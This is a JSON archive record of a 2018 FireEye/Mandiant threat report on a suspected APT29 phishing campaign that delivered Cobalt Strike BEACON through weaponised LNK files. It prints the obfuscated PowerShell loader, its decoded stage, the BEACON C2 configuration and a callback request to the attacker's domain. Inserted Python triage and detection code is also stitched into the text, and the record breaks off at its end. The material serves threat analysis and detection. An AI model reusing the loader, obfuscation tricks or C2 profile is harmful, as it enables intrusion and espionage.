{
	"id": "c8a22acc-6a25-4dc8-aaf8-8090e94b703f",
	"created_at": "2026-04-06T00:08:27.480685Z",
	"updated_at": "2026-04-10T03:37:16.73422Z",
	"deleted_at": null,
	"sha1_hash": "fb43ff546455506c41067543baf645a7b61a3fd8",
	"title": "Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1464704,
	"plain_text": "Not So Cozy: An Uncomfortable Examination of a Suspected APT29\r\nPhishing Campaign | Mandiant\r\nBy Mandiant\r\nPublished: 2018-11-19 · Archived: 2026-04-05 15:06:28 UTC\r\nWritten by: Matthew Dunwoody, Andrew Thompson, Ben Withnell, Jonathan Leathery, Michael Matonis, Nick Carr\r\nIntroduction\r\nFireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement,\r\nmedia, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.\r\nThe attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files\r\ncontaining malicious Windows shortcuts that delivered Cobalt Strike Beacon.\r\nShared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to\r\npreviously observed activity suspected to be APT29.\r\nAPT29 is known to transition away from phishing implants within hours of initial compromise.\r\nOn November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple\r\nindustries.\r\n(UPDATE) This campaign has targeted over 20 FireEye customers across: Defense, Imagery, Law Enforcement,\r\nLocal Government, Media, Military, Pharmaceutical, Think Tank, Transportation, \u0026 US Public Sector industries in\r\nmultiple geographic regions.\r\nFireEye (@FireEye) November 15, 2018\r\nThe attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company\r\nin order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure\r\ncommunication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another\r\nDepartment of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. 
This\r\ninformation could be obtained via publicly available data, and there is no indication that the Department of State network\r\nwas involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed\r\nwere used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy\r\ndocument and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.\r\nSeveral elements from this campaign – including the resources invested in the phishing email and network infrastructure, the\r\nmetadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are\r\ndirectly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical\r\nbreadcrumbs and the possible intentions of this activity.\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 1 of 11\r\nAttribution Challenges\r\nConclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at\r\ncompromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still\r\nanalyzing this activity.\r\nThere are several similarities and technical overlaps between the 14 November 2018 phishing campaign and the suspected\r\nAPT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new\r\ncampaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and\r\nprocedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. 
APT29 is a sophisticated\r\nactor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering\r\nhistorical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively\r\nidentified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long\r\ninterlude.\r\nNotable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and\r\nspecific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the\r\nuse of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially\r\navailable frameworks for reasons such as plausible deniability.\r\nDuring the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For\r\nexample, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly\r\navailable Department of State form. It is possible that the threat actor served additional and different payloads depending on\r\nthe link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.\r\nWe provide details of this in the activ﻿ity summary. Analysis of the campaign is ongoing, and we welcome any additional\r\ninformation from the community.\r\nActivity Summary\r\nThe threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an\r\nofficial document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely\r\ncompromised legitimate domain, jmj[.]com. 
The shortcut file was crafted to execute a PowerShell command that read,\r\ndecoded, and executed additional code from within the shortcut file.\r\nUpon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike\r\nBeacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with\r\na modified variation of the publicly available \"Pandora\" Malleable C2 Profile and used a command and control (C2) domain\r\n– pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2\r\nprofile may have been intended to defeat less resilient network detection methods dependent on the default configurations.\r\nThe shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016\r\ncampaign. The decoy content is shown in Figure 1.\r\nFigure 1: Decoy document content\r\nSimilarities to Older Activity\r\nThis activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the\r\nrecent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a\r\nsuspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5:\r\nf713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar\r\nin structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK\r\nwas created.\r\nAdditional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing\r\nthese LNK files. 
Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has\r\nleveraged large waves of emails in previous campaigns.\r\nOutlook and Implications\r\nAnalysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered\r\nfrom this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have\r\npreviously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was\r\nconducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical\r\nimportance if the elusive and deceptive APT29 operators indeed had access to your environment.\r\nTechnical Details\r\nPhishing\r\nEmails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[\r\nwith the subject Stevenson, Susan N shared \"TP18-DS7002 (UNCLASSIFIED)\" with you. The distribution of emails varied\r\nsignificantly between the affected organizations. While most targeted FireEye customers received three or fewer emails,\r\nsome received significantly more, with one customer receiving 136.\r\nEach phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown\r\nin Figure 2.\r\nFigure 2: Malicious URL structure\r\nOutside of the length of the sender email address, which may have been truncated on some recipient email clients, the\r\nattacker made little effort to hide the true source of the emails, including that they were not actually sent from the\r\nDepartment of State. 
Figure 3 provides a redacted snapshot of email headers from the phishing message.\r\nFigure 3: Redacted email headers\r\nThe malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5:\r\n3fccf531ff0ae6fedd7c586774b17a2d) contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was\r\na malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a\r\nPowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON\r\nbackdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained\r\nonly the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears\r\nto have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.\r\nThe BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged\r\nprivacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.\r\nOur analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a\r\nsignificantly longer delay than many other attackers we track. 
Table 1 contains a timeline of this activity.\r\nTime | Event | Source\r\n2018-10-15 15:35:19Z | pandorasong[.]com registered | Registrant Information\r\n2018-10-15 17:39:00Z | pandorasong[.]com SSL certificate established | Certificate Transparency\r\n2018-10-15 18:52:06Z | Cobalt Strike server established | Scan Data\r\n2018-11-02 10:25:58Z | LNK weaponized | LNK Metadata\r\n2018-11-13 17:58:41Z | 3fccf531ff0ae6fedd7c586774b17a2d modified | Archive Metadata\r\n2018-11-14 01:48:34Z | 658c6fe38f95995fa8dc8f6cfe41df7b modified | Archive Metadata\r\n2018-11-14 08:23:10Z | First observed phishing e-mail sent | Telemetry\r\nTable 1: Operational timeline\r\nExecution\r\nUpon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell\r\ncommand was executed (the base64 argument is shown joined; the PDF rendering wrapped it across lines):\r\n\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noni -ep bypass\r\n$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;\r\nThis command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. 
For example, 'FromBase'+0x40+'String' is used in place of FromBase64String, the .NET method the script calls to decode\r\nbase64; PowerShell appends the integer as its decimal string, so the method name is assembled only at run time and\r\nnever appears literally in the command line, which defeats a signature on that literal.\r\nThe decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset\r\n0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded\r\nPowerShell code decoded to the following:\r\n$ptgt=0x0005e2be;\r\n$vcq=0x000623b6;\r\n$tb=\"ds7002.lnk\";\r\nif (-not(Test-Path $tb))\r\n{\r\n  $oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;\r\n  if (-not $oe)\r\n  {\r\n    exit\r\n  }\r\n  [IO.Directory]::SetCurrentDirectory($oe.DirectoryName);\r\n}\r\n$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';\r\n$oe=New-Object byte[]($vcq-$ptgt);\r\n$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);\r\n$r=$vzvi.Read($oe,0,$vcq-$ptgt);\r\n$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);\r\n$zk=[Text.Encoding]::ASCII.GetString($oe);\r\niex $zk;\r\nWhen the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that\r\nsimilarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating\r\nstrings contained in the script.\r\nFigure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)\r\nThe PowerShell loader code is obfuscated; a short de-obfuscated snippet follows below. The decoy PDF and\r\nBEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. 
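The loader chain just described, re-implemented for static triage. This is an added example in Python; it is neither FireEye code nor the actor's. It folds the 'FromBase'+0x40+'String' concatenation, base64-decodes the $zk argument, reads the two offsets that open stage 1, and carves the region they bound from the LNK the way the FileStream.Seek/Read plus FromBase64CharArray sequence does. The stage-1 argument string is quoted from the report; the LNK image is constructed here (a zero-filled buffer with a harmless script planted at the real offsets) so the script runs offline. The inner decoding of the dropped PDF and DLL (the XOR routine of Figure 4) is not reproduced, since the report does not give its key.

```python
# Added example, not code from the report or from the actor: re-implements
# for static triage the two-stage loader logic described above. The LNK
# buffer is CONSTRUCTED here so the script runs offline; only the stage-1
# PowerShell arguments are quoted verbatim from the report.
import base64
import re

# Arguments of the powershell.exe command line printed above, PDF wraps
# removed. The executable path is omitted; it carries no data.
STAGE1_CMD = (
    '''-noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5'''
    '''rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE'''
    '''Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W'''
    '''0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp'''
    '''O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ'''
    '''1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en'''
    '''ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC'''
    '''gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy'''
    '''cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL'''
    '''kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';'''
    '''$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;'''
)

# 'a'+0x40+'b': PowerShell coerces the integer to its decimal string when the
# left operand is a string, so this evaluates to 'a64b'.
CONCAT_RE = re.compile(
    r'''(['])([^']*)(['])[ ]*[+][ ]*(0x[0-9A-Fa-f]+|[0-9]+)[ ]*[+][ ]*(['])([^']*)(['])'''
)
ZK_RE = re.compile(r'''[$]zk=(['])([A-Za-z0-9+/=]+)(['])''')
OFFSETS_RE = re.compile(
    r'''^[$][A-Za-z_][A-Za-z0-9_]*=(0x[0-9A-Fa-f]+);[ ]*[$][A-Za-z_][A-Za-z0-9_]*=(0x[0-9A-Fa-f]+);'''
)

def fold_string_concat(ps):
    '''Resolve string+int+string concatenations so the method name appears
    literally, e.g. 'FromBase'+0x40+'String' becomes 'FromBase64String'.'''
    def repl(m):
        return m.group(1) + m.group(2) + str(int(m.group(4), 0)) + m.group(6) + m.group(7)
    return CONCAT_RE.sub(repl, ps)

def decode_stage1(ps):
    '''Decode the base64 literal assigned to $zk, which the script itself
    hands to [Convert]::FromBase64String at run time.'''
    m = ZK_RE.search(ps)
    if not m:
        raise ValueError('no $zk base64 literal found')
    return base64.b64decode(m.group(2)).decode('ascii')

def parse_offsets(stage1):
    '''Stage 1 opens with two hex assignments: start and end (exclusive) of
    the region of ds7002.lnk that holds the base64-encoded stage 2.'''
    m = OFFSETS_RE.match(stage1)
    if not m:
        raise ValueError('stage 1 does not open with the two offset assignments')
    return int(m.group(1), 16), int(m.group(2), 16)

def carve_stage2(lnk, start, end):
    '''Mirror of FileStream.Seek/Read followed by FromBase64CharArray: the
    whole region must be valid base64, exactly as the loader assumes.'''
    region = lnk[start:end]
    if len(region) != end - start:
        raise ValueError('file is shorter than the offsets claim')
    return base64.b64decode(region, validate=True).decode('ascii')

SAMPLE_STAGE2 = 'Write-Host stage2-placeholder'  # CONSTRUCTED, harmless

def build_sample_lnk(start, end, script=SAMPLE_STAGE2):
    '''CONSTRUCTED stand-in for ds7002.lnk: zero bytes up to start, then the
    script base64-encoded so that it fills [start, end) exactly (space
    padding keeps the decode valid), then a short trailer.'''
    region_len = end - start
    plain = script.ljust(region_len * 3 // 4).encode('ascii')
    b64 = base64.b64encode(plain)
    if len(b64) != region_len:
        raise ValueError('region length must be a multiple of 4')
    return bytes(start) + b64 + bytes(16)

def triage(lnk, cmd):
    '''Run the full chain on an LNK image and its extracted command line.'''
    folded = fold_string_concat(cmd)
    stage1 = decode_stage1(folded)
    start, end = parse_offsets(stage1)
    return {
        'dynamic_method': 'FromBase64String' in folded,
        'start': start,
        'end': end,
        'stage1': stage1,
        'stage2': carve_stage2(lnk, start, end).rstrip(),
    }

if __name__ == '__main__':
    result = triage(build_sample_lnk(0x5e2be, 0x623b6), STAGE1_CMD)
    print(hex(result['start']), hex(result['end']), result['dynamic_method'])
    print(result['stage1'])
    print(result['stage2'])
```

Against a real ds7002.lnk you would pass the file bytes together with the command line recovered from the LNK's argument field; the carve raises if the region is not entirely valid base64, which is also what the loader itself requires, so a truncated or re-saved sample fails loudly rather than silently.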
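Detection logic for the customized Pandora profile, as an added example (not FireEye detection content). It keys on the combination of traits visible in the BEACON configuration and the callback reproduced under Network Communications below, and deliberately ignores the Host header so a re-pointed C2 domain still matches: the UPnP GetContentFeatures.DLNA.ORG header on an internet HTTPS request, the fixed __utma cookie, the IE11 user agent string, the /access/?version=..&lid=..&token=.. shape with a token drawn only from the letters a to p (the alphabet of Cobalt Strike's netbios transform; that encoding is an assumption, the report does not name it), and the text/xml POST to /radio/xmlrpc/v45. The request captures are constructed; the first mirrors the printed callback with a shortened token, and the raw-request input format is an assumption.

```python
# Added example, not FireEye detection content: flags the customized Pandora
# malleable C2 profile by the combination of traits in the BEACON
# configuration and callback below, independent of the Host header. Request
# captures are CONSTRUCTED; the input format (raw request text) is an assumption.
import re
from urllib.parse import parse_qs, urlsplit

UTMA_COOKIE = '__utma=310066733.2884534440.1433201462.1403204372.1385202498.7;'
IE11_UA = 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
GET_PATH = '/access/'
POST_PATH = '/radio/xmlrpc/v45'
# Assumption: the token is Cobalt Strike netbios-encoded metadata, whose
# alphabet is the letters a..p (one letter per nibble, hence even length).
NETBIOS_RE = re.compile(r'^[a-pA-P]+$')

def parse_request(raw):
    '''Split a raw HTTP request (CRLF or LF) into method, target and a
    lower-cased header map; any body is ignored.'''
    lines = raw.splitlines()
    method, target, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return {'method': method, 'target': target, 'headers': headers}

def fingerprint(req):
    '''Return the profile traits present. Each is weak alone (IE11 is a real
    browser, __utma is a real cookie); two or more together are not.'''
    h = req['headers']
    hits = []
    if 'getcontentfeatures.dlna.org' in h:
        hits.append('dlna_header')  # UPnP/DLNA header on an internet HTTPS request
    if h.get('cookie', '').replace(' ', '') == UTMA_COOKIE:
        hits.append('static_utma_cookie')  # identical across hosts and sessions
    if h.get('user-agent') == IE11_UA:
        hits.append('ie11_wow64_ua')
    url = urlsplit(req['target'])
    qs = parse_qs(url.query)
    if (req['method'] == 'GET' and url.path == GET_PATH
            and {'version', 'lid', 'token'} <= set(qs)):
        token = qs['token'][0]
        if NETBIOS_RE.match(token) and len(token) % 2 == 0:
            hits.append('access_uri_netbios_token')
    if (req['method'] == 'POST' and url.path == POST_PATH
            and h.get('content-type') == 'text/xml'
            and h.get('x-requested-with') == 'XMLHttpRequest'):
        hits.append('xmlrpc_post_shape')
    return hits

def verdict(raw, threshold=2):
    '''(flagged, traits) for one raw request.'''
    hits = fingerprint(parse_request(raw))
    return len(hits) >= threshold, hits

CRLF = chr(13) + chr(10)
# CONSTRUCTED: mirrors the callback printed below, token cut to its first 32 letters.
BEACON_GET = CRLF.join([
    'GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep HTTP/1.1',
    'Accept: */*',
    'GetContentFeatures.DLNA.ORG: 1',
    'Host: pandorasong.com',
    'Cookie: ' + UTMA_COOKIE,
    'User-Agent: ' + IE11_UA,
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    '',
])
# CONSTRUCTED: the same profile re-pointed at another domain.
REPOINTED_GET = BEACON_GET.replace('Host: pandorasong.com', 'Host: cdn.example.net')
# CONSTRUCTED: the post side of the profile, from http_headers_c2_post_req.
BEACON_POST = CRLF.join([
    'POST /radio/xmlrpc/v45 HTTP/1.1',
    'Accept: */*',
    'Content-Type: text/xml',
    'X-Requested-With: XMLHttpRequest',
    'Host: pandorasong.com',
    'User-Agent: ' + IE11_UA,
    'Content-Length: 0',
    '',
])
# CONSTRUCTED: a browser hitting a similarly shaped URL on an unrelated site.
BROWSER_GET = CRLF.join([
    'GET /access/?version=4&lid=77&token=Ab12-cdEF HTTP/1.1',
    'Host: www.example.com',
    'Cookie: __utma=1.2.3.4.5.6;',
    'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
    '',
])

if __name__ == '__main__':
    for name, raw in [('beacon_get', BEACON_GET), ('repointed', REPOINTED_GET),
                      ('beacon_post', BEACON_POST), ('browser', BROWSER_GET)]:
        print(name, verdict(raw))
```

The point of scoring the combination rather than the domain is the one the report makes about the profile edit: the operator changed the Host and the domain, not the header set, cookie, user agent or URI scheme that the public Pandora profile carries, so a rule pinned to www.pandora.com misses this sample while one pinned to the traits still fires on the re-pointed capture.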
The BEACON\r\nloader DLL is executed with the export function \"PointFunctionCall\":\r\n[TRUNCATED]\r\n$jzffhy = [IO.FileAccess]::READ\r\n$gibisec = myayxvj $(\"ds7002.lnk\")\r\n$oufgke = 0x48bd8\r\n$wabxu = 0x5e2be - $oufgke\r\n$lblij = bygtqi $gibisec $oufgke $wabxu $(\"%TEMP%\\ds7002.PDF\")\r\nInvoke-Item $((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))\r\n$oufgke = 0x0dd8\r\n$wabxu = 0x48bd8 - $oufgke\r\n$yhcgpw = bygtqi $gibisec $oufgke $wabxu $(\"%LOCALAPPDATA%\\cyzfc.dat\")\r\nif ($ENV:PROCESSOR_ARCHITECTURE -eq $(\"AMD64\")) { \u0026 ($(\"rundll32.exe\")) $(\",\") $(\"PointFunctionCall\") }\r\nFiles Dropped\r\nUpon successful execution of the LNK file, it dropped the following files to the victim's system:\r\n%APPDATA%\\Local\\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b): BEACON loader DLL\r\n%TEMP%\\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd): decoy document\r\nThe dropped BEACON loader DLL was executed by RunDll32.exe using the export function \"PointFunctionCall\":\r\n\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\Administrator\\AppData\\Local\\cyzfc.dat, PointFunctionCall\r\nThe BEACON payload included the following configuration:\r\nauthorization_id: 0x311168c\r\ndns_sleep: 0\r\nhttp_headers_c2_post_req:\r\n  Accept: */*\r\n  Content-Type: text/xml\r\n  X-Requested-With: XMLHttpRequest\r\n  Host: pandorasong[.]com\r\nhttp_headers_c2_request:\r\n  Accept: */*\r\n  GetContentFeatures.DLNA.ORG: 1\r\n  Host: pandorasong[.]com\r\n  Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\njitter: 17\r\nnamed_pipes: \\\\\\\\%s\\\\pipe\\\\msagent_%x\r\nprocess_inject_targets:\r\n  %windir%\\\\syswow64\\\\rundll32.exe\r\n  %windir%\\\\sysnative\\\\rundll32.exe\r\nbeacon_interval: 300\r\nc2:\r\n  conntype: SSL\r\n  host: pandorasong[.]com\r\n  port: 443\r\nc2_urls:\r\n  pandorasong[.]com/radio/xmlrpc/v45\r\n  pandorasong[.]com/access/\r\nc2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nNetwork Communications\r\nAfter successful installation/initialization of the malware, it made the following callback to the C2 server\r\npandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network\r\ncommunications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile.\r\nThe profile may have been changed to bypass common detections for the publicly available malleable profiles. The\r\nfollowing is a sample GET request (the token is shown joined; the PDF rendering wrapped it across lines):\r\nGET /access/?version=4\u0026lid=1582502724\u0026token=ajlomeomnmeapoagcknffjaehikhmpepBdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjdMjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbgagigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko HTTP/1.1\r\nAccept: */*\r\nGetContentFeatures.DLNA.ORG: 1\r\nHost: pandorasong.com\r\nCookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nSimilarities to Older Activity\r\nFigure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails,\r\nds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016\r\nattack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5:\r\nf713d5df826c6051e65f995e57d6817d).\r\nFigure 5: LNK characteristics: new activity (left) and old activity 
(right)\r\nFigure 6: LNK characteristics: new activity (left) and old activity (right)\r\nIn addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that\r\nexecuted the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7\r\nand Figure 8.\r\nFigure 7: Embedded PowerShell: new activity (left) and old activity (right)\r\nFigure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)\r\nIndicators\r\nIndicator | Description\r\ndosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org | Phishing email address from likely compromised legitimate server\r\nStevenson, Susan N shared \"TP18-DS7002 (UNCLASSIFIED)\" with you | Phishing email subject\r\nhttps://www.jmj[.]com/personal/nauerthn_state_gov/* | Malware hosting location on likely compromised legitimate domain\r\npandorasong[.]com | BEACON C2\r\n95.216.59[.]92 | Resolution of pandorasong[.]com\r\n2b13b244aafe1ecace61ea1119a1b2ee | SSL certificate for pandorasong[.]com\r\n3fccf531ff0ae6fedd7c586774b17a2d | Malicious ZIP archive MD5\r\n658c6fe38f95995fa8dc8f6cfe41df7b | Benign ZIP archive MD5\r\n6ed0020b0851fb71d5b0076f4ee95f3c | Malicious LNK file MD5\r\n313f4808aa2a2073005d219bc68971cd | Benign decoy PDF MD5\r\n16bbc967a8b6a365871a05c74a4f345b | BEACON DLL MD5\r\n%APPDATA%\\Local\\cyzfc.dat | BEACON DLL file path\r\n%TEMP%\\ds7002.PDF | Benign decoy PDF file path\r\nTable 2: Indicators\r\nRelated Samples\r\n37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)\r\nFireEye Detection\r\nFireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.\r\nProduct / Detection names\r\nNetwork Security\r\n  Malware.Archive\r\n  Malware.Binary.lnk\r\n  Suspicious.Backdoor.Beacon\r\nEndpoint Security\r\n  SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\r\n  Generic.mg.16bbc967a8b6a365\r\nThreat Analytics Platform\r\n  WINDOWS METHODOLOGY [PowerShell Base64 String]\r\n  WINDOWS METHODOLOGY [Rundll32 Roaming]\r\n  WINDOWS METHODOLOGY [PowerShell Script Block Warning]\r\n  WINDOWS METHODOLOGY [Base64 Char Args]\r\n  TADPOLE DOWNLOADER [Rundll Args]\r\n  INTEL HIT - IP [Structured Threat Reputation-Based]\r\n  INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]\r\n  INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]\r\n  INTEL HIT - FILE HASH [Structured Threat Reputation-Based]\r\nTable 3: FireEye product detections\r\nPosted in: Threat Intelligence, Security \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html"
	],
	"report_names": [
		"not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
